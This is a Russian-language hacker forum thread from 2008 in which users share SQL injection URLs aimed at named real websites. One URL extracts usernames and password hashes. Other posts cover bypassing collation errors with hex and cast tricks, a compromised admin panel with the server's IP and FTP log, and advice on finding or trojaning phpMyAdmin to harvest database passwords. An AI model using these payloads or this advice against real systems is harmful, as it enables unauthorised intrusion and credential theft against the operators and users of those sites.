Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    лови ))
    http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/*
    ======================
    http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,concat_ws(0x3a,username,pword_hash),3,4,5,6,7+from+user/*
    что за тип хеша - не знаю :D
    можт кодировка !?
     
    #2801 159932, 4 Aug 2008
    Last edited: 4 Aug 2008
    1 person likes this.
  2. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Ух какая в минусе сила. Спасибо! :)

    Угу, чет хэш загадочный. :eek: ... Пойду гуглить.
     
    #2802 USAkid, 4 Aug 2008
    Last edited: 4 Aug 2008
    1 person likes this.
  3. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Пытаюсь сделать
    Code:
    script.php?id=199'union+select+1,2,user(),4,5,6,7,8,9,10/*
    а вылазит:
    Code:
    Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
    SELECT *, UNIX_TIMESTAMP(`itemdate`) AS `unix_time` FROM `umsec_news_items` WHERE `id`='199'union select 1,2,user(),4,5,6,7,8,9,10/*'
    Ладно, кодирую в hex
    Code:
    script.php?id=-113'+union+select+1,2,0x76657273696f6e2829,4,5,6,7,8,9,10/*
    А там где должна быть инфа о версии показывает тупо слово version()

    Можно где-нить об етом почитать или что-нить узнать подробнее?
     
    #2803 USAkid, 4 Aug 2008
    Last edited: 4 Aug 2008
  4. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    USAkid
    или использовать конструкцию unhex(hex())
    кстати намного удобнее чем aes_decrypt(aes_encrypt,0x71),0x71)
     
    #2804 sabe, 4 Aug 2008
    Last edited: 4 Aug 2008
  5. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Зачем в Hex кодировать? У вас проблемы с кодировкой.
    Попробуйте вот это:
    Или в
     
  6. Redyps

    Redyps Banned

    Joined:
    17 Jul 2008
    Messages:
    11
    Likes Received:
    10
    Reputations:
    5
    проще всего имхо cast(version()+as+binary)
     
  7. *eXe*

    *eXe* Banned

    Joined:
    20 May 2008
    Messages:
    0
    Likes Received:
    184
    Reputations:
    0
    имею доступ к панели управления http://www.neo-nvk.ru/newsphp/newsok/admin.php
    а на фтп немогу приконектится. конектится вроде нормально... пароль и логин признаёт.. а потом срывается
    Response: 550 Permission denied.
    Error: Could not retrieve directory listing
     
  8. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    *eXe*
    по IP блокирует ;)
     
  9. *eXe*

    *eXe* Banned

    Joined:
    20 May 2008
    Messages:
    0
    Likes Received:
    184
    Reputations:
    0
    aka PSIH
    а разблокируется только с админки?
     
  10. Redyps

    Redyps Banned

    Joined:
    17 Jul 2008
    Messages:
    11
    Likes Received:
    10
    Reputations:
    5
    омг, это с каких пор штацес блокирует конект по фтп? aka PSIH, вы бредите
     
  11. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    мля, сорри сорри )))
    прочитал только первую и последние строчки...

    тогда
    /me стыдно :(
     
    #2811 aka PSIH, 4 Aug 2008
    Last edited: 4 Aug 2008
  12. *eXe*

    *eXe* Banned

    Joined:
    20 May 2008
    Messages:
    0
    Likes Received:
    184
    Reputations:
    0
    black-list.gu.ma
    что можете сказать?*??
    вроде что то опасное
     
  13. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Найденная мной одна из кссок на ксакепе, заюзанная челом с ником Tray)
     
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    где phpmyadmin хранит пароли?
     
  15. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Наиболее частые случаи (везде по разному):

    1. Базовая авторизация на директории с ПМА (т.е. информация о БД прописана в файл), а за доступ к директории отвечают файлы .htaccess и .htpasswd
    2. Данные для подключения к БД нигде не хранятся, а вводятся ползователем, т.е. логин который он просит ввести это логин пользователя БД, а пароль соответтвенно пароль указанного пользователя БД.
    3. Вроде ещё в самой БД может хранится.
     
    1 person likes this.
  16. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Grey
    понятно.. в моем случаи логин и пасс пользователя БД есть но нехватает прав чтобы просмотреть mysql.user, хотел узнать пасс рута.. я имею доступ к папке phpmyadmin через шелл.. просморев файлы нече не нашел... спасибо....
     
  17. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Так в mysql.user и храняться пассы

    4.Пассы хроняться в куках ;))
     
    #2817 DDoSька, 4 Aug 2008
    Last edited: 4 Aug 2008
    1 person likes this.
  18. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    DDoSька
    да...... но прав чтобы просмотреть нету.

    и еще как я знаю.. что вся база данных mysql хранится в файлах на сервере?
     
  19. none222

    none222 Guest

    Reputations:
    0
    1 попробуй пароли что нарыл к фтп
    2 если есть права - можешь протроянить пхпмуфдмин(чтобы введённые пассы сохранялись в лог)
     
  20. *eXe*

    *eXe* Banned

    Joined:
    20 May 2008
    Messages:
    0
    Likes Received:
    184
    Reputations:
    0
    я заходил через ай пи сервака

    Для доступа по FTP используйте в качестве hostname (адрес хоста) IP сервера.
    Информация аккаунта:
    Домен: neo-nvk.ru
    IP сервера*: 77.222.40.12

    HTML:
    Status:	Connecting to 77.222.40.12 ...
    Status:	Connected with 77.222.40.12. Waiting for welcome message...
    Response:	220 (vsFTPd 1.2.2)
    Command:	USER ********
    Response:	331 Please specify the password.
    Command:	PASS *********
    Response:	230 Login successful.
    Command:	FEAT
    Response:	211-Features:
    Response:	 MDTM
    Response:	 REST STREAM
    Response:	 SIZE
    Response:	211 End
    Command:	SYST
    Response:	215 UNIX Type: L8
    Status:	Connected
    Status:	Retrieving directory listing...
    Command:	PWD
    Response:	257 "/"
    Command:	TYPE A
    Response:	200 Switching to ASCII mode.
    Command:	PASV
    Response:	550 Permission denied.
    Error:	[COLOR=Red]Could not retrieve directory listing[/COLOR]
     
Thread Status:
Not open for further replies.